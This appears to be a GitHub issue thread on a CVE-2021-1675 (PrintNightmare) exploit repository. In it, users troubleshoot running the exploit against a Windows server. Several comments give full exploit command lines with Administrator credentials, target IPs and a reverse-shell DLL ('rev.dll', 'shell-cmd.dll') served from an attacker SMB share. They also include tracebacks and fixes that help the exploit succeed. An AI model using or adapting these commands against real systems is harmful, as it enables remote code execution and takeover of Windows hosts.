Comments (13)
rahultalekar
commented on June 15, 2024
can you show your command @mrh3r000
from cve-2021-1675.
mrh3r000
commented on June 15, 2024
This is my command.
──(root💀kali)-[/tmp]
└─# python3 CVE-2021-1675.py se1300340/Administrator:Admin@[email protected] '\\192.168.40.155\smb\shell-cmd.dll'
from cve-2021-1675.
rahultalekar
commented on June 15, 2024
what is se1300340 ? is it dc name or netbios name? on which windows you are trying this ?
from cve-2021-1675.
mrh3r000
commented on June 15, 2024
se1300340 is the domain name of the server. I execute in tmp windows.
from cve-2021-1675.
rahultalekar
commented on June 15, 2024
so its dc ? which windows 19 ? and which samba server you use to host dll payload ? is it smb3 ?
from cve-2021-1675.
mrh3r000
commented on June 15, 2024
i use smb3 to save payload. I don't understand where "/impacket$ ./CVE-2021-1675.py domain.local/dummy:[email protected] '\10.1.1.10\smb\shell-cmd.dll' " (this is the manual file from another source).This step i perform mining in windows tmp or impacket ?
from cve-2021-1675.
rahultalekar
commented on June 15, 2024
#19 follow this
you have to use impacket.
from cve-2021-1675.
mrh3r000
commented on June 15, 2024
Thank you senior. I will try again. ^_^ @rahultalekar
from cve-2021-1675.
mrh3r000
commented on June 15, 2024
Hey bro, @rahultalekar .
I have a new problem. Please help me. T_T
┌──(root💀kali)-[~/CVE-2021-1675]
└─# python3 CVE-2021-1675.py se130034/Administrator:Admin@[email protected] '\\192.168.40.155>\smb\rev.dll'
[*] Connecting to ncacn_np:192.168.40.195[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_64a5c2d136933c8f\Amd64\UNIDRV.DLL
[*] Executing \\192.168.40.155>\smb\rev.dll
[*] Try 1...
Traceback (most recent call last):
File "/root/CVE-2021-1675/CVE-2021-1675.py", line 176, in <module>
main(dce, pDriverPath, options.share)
File "/root/CVE-2021-1675/CVE-2021-1675.py", line 84, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x35 - ERROR_BAD_NETPATH - The network path was not found.
from cve-2021-1675.
rahultalekar
commented on June 15, 2024
@mrh3r000 your command is wrong remove > from \192.168.40.155> and then run again
from cve-2021-1675.
aaminin
commented on June 15, 2024
try this:
python3 CVE-2021-1675.py se1300340/Administrator:'Admin@123'@192.168.40.195 '\192.168.40.155\smb\shell-cmd.dll
from cve-2021-1675.
mrh3r000
commented on June 15, 2024
@rahultalekar
So that's the fault. Don't know if there is a py file error?
┌──(root💀kali)-[~/CVE-2021-1675]
└─# python3 CVE-2021-1675.py se130034/Administrator:'Admin@123'@192.168.40.195 '\\192.168.40.155\smb\rev.dll' 1 ⨯
[*] Connecting to ncacn_np:192.168.40.195[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_64a5c2d136933c8f\Amd64\UNIDRV.DLL
[*] Executing \\192.168.40.155\smb\rev.dll
[*] Try 1...
Traceback (most recent call last):
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 983, in non_polling_read
received = self._sock.recv(bytes_left)
socket.timeout: timed out
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/root/CVE-2021-1675/CVE-2021-1675.py", line 176, in <module>
main(dce, pDriverPath, options.share)
File "/root/CVE-2021-1675/CVE-2021-1675.py", line 84, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 857, in request
answer = self.recv()
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1308, in recv
response_data = self._transport.recv(forceRecv, count=MSRPCRespHeader._SIZE)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/transport.py", line 547, in recv
return self.__smb_connection.readFile(self.__tid, self.__handle)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 597, in readFile
bytesRead = self._SMBConnection.read_andx(treeId, fileId, offset, toRead)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1975, in read_andx
return self.read(tid, fid, offset, max_size, wait_answer)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1310, in read
ans = self.recvSMB(packetID)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 454, in recvSMB
data = self._NetBIOSSession.recv_packet(self._timeout)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 914, in recv_packet
data = self.__read(timeout)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 1001, in __read
data = self.read_function(4, timeout)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 985, in non_polling_read
raise NetBIOSTimeout
impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out.
from cve-2021-1675.
SumenjakZiga
commented on June 15, 2024
If u still can't run it try a password without '@'. He is filtering out '@' in the PoC code, at least I think so.
from cve-2021-1675.
Related Issues (20)
- impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x3 - ERROR_PATH_NOT_FOUND - The system cannot find the path specified. HOT 7
- How can i Encrypt the dll payload
- ERROR_PATH_NOT_FOUND - The system cannot find the path specified HOT 4
- OSERROR: [WinError 10013] Access to a socket was not permitted due to the access rights of the socket.
- SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.) HOT 2
- RPRN SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND HOT 5
- RPRN SessionError: code: 0xa1 - ERROR_BAD_PATHNAME - The specified path is invalid. HOT 3
- Failed to enumerate remote pDriverPath HOT 5
- impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: unknown error code: 0x8001011b HOT 1
- unkown error code: 0x8001011b HOT 2
- impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x35 - ERROR_BAD_NETPATH - The network path was not found. HOT 3
- impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x43 - ERROR_BAD_NET_NAME HOT 2
- impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x20 - ERROR_SHARING_VIOLATION - The process cannot access the file because it is being used by another process.
- Question: Why you need to know real pDriverPath ?
- Problem while executing CVE-2021-1675 HOT 2
- RPRN SessionError: code: 0x6 - ERROR_INVALID_HANDLE HOT 1
- not returning shell HOT 3
- [!] EnumPrinterDrivers should fail! HOT 1
- Dll not executing HOT 1
- DCERPCSessionError: and RPRN SessionError:
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from cve-2021-1675.